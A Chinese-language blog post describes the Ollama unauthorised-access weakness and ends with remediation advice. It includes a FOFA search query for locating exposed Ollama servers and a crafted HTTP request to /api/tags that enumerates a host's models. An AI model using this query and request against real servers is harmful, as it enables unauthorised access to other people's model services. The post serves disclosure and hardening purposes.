
漏洞挖掘 --- Ollama未授权访问
Ollama 是一个开源的大型语言模型(LLM)运行环境和工具集,旨在帮助开发者轻松部署、管理和使用模型(例如 DeepSeek 等)。Ollama 存在未授权访问漏洞,该漏洞是由于 Ollama 默认未设置身份验证和访问控制功能,允许未授权的攻击者在远程条件下调用 Ollama 服务接口并执行恶意操作,包括但不限于敏感模型资产窃取、虚假信息输入、模型计算资源滥用和拒绝服务、系统配置篡改和扩展利用
·
一、漏洞描述
Ollama 是一个开源的大型语言模型(LLM)运行环境和工具集,旨在帮助开发者轻松部署、管理和使用模型(例如 DeepSeek 等)。Ollama 存在未授权访问漏洞,该漏洞是由于 Ollama 默认未设置身份验证和访问控制功能,允许未授权的攻击者在远程条件下调用 Ollama 服务接口并执行恶意操作,包括但不限于敏感模型资产窃取、虚假信息输入、模型计算资源滥用和拒绝服务、系统配置篡改和扩展利用。
二、影响范围
全版本(未设置访问认证的情况下)
三、FOFA-Search...
app="Ollama" && is_domain=false && country="CN"
四、访问并抓包
五、发送到重放器构造
#构造 --- 只留下面的6个字段,注意有两空行
GET /api/tags HTTP/1.1
Host: *******抓到的
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
六、修复建议
- 若Ollama只提供本地服务,设置环境变量Environment="OLLAMA_HOST=127.0.0.1",仅允许本地访问
- 若Ollama需提供公网服务,选择以下方法添加认证机制:
1)修改config.yaml、settings.json 配置文件,限定可访问Ollama 服务的IP地址;
2)通过防火墙等设备配置IP白名单,阻止非授权IP的访问请求;
3)通过反向代理进行身份验证和授权(如使用OAuth2.0协议),防止未经授权用户访问。
FROM IYU_
更多推荐
所有评论(0)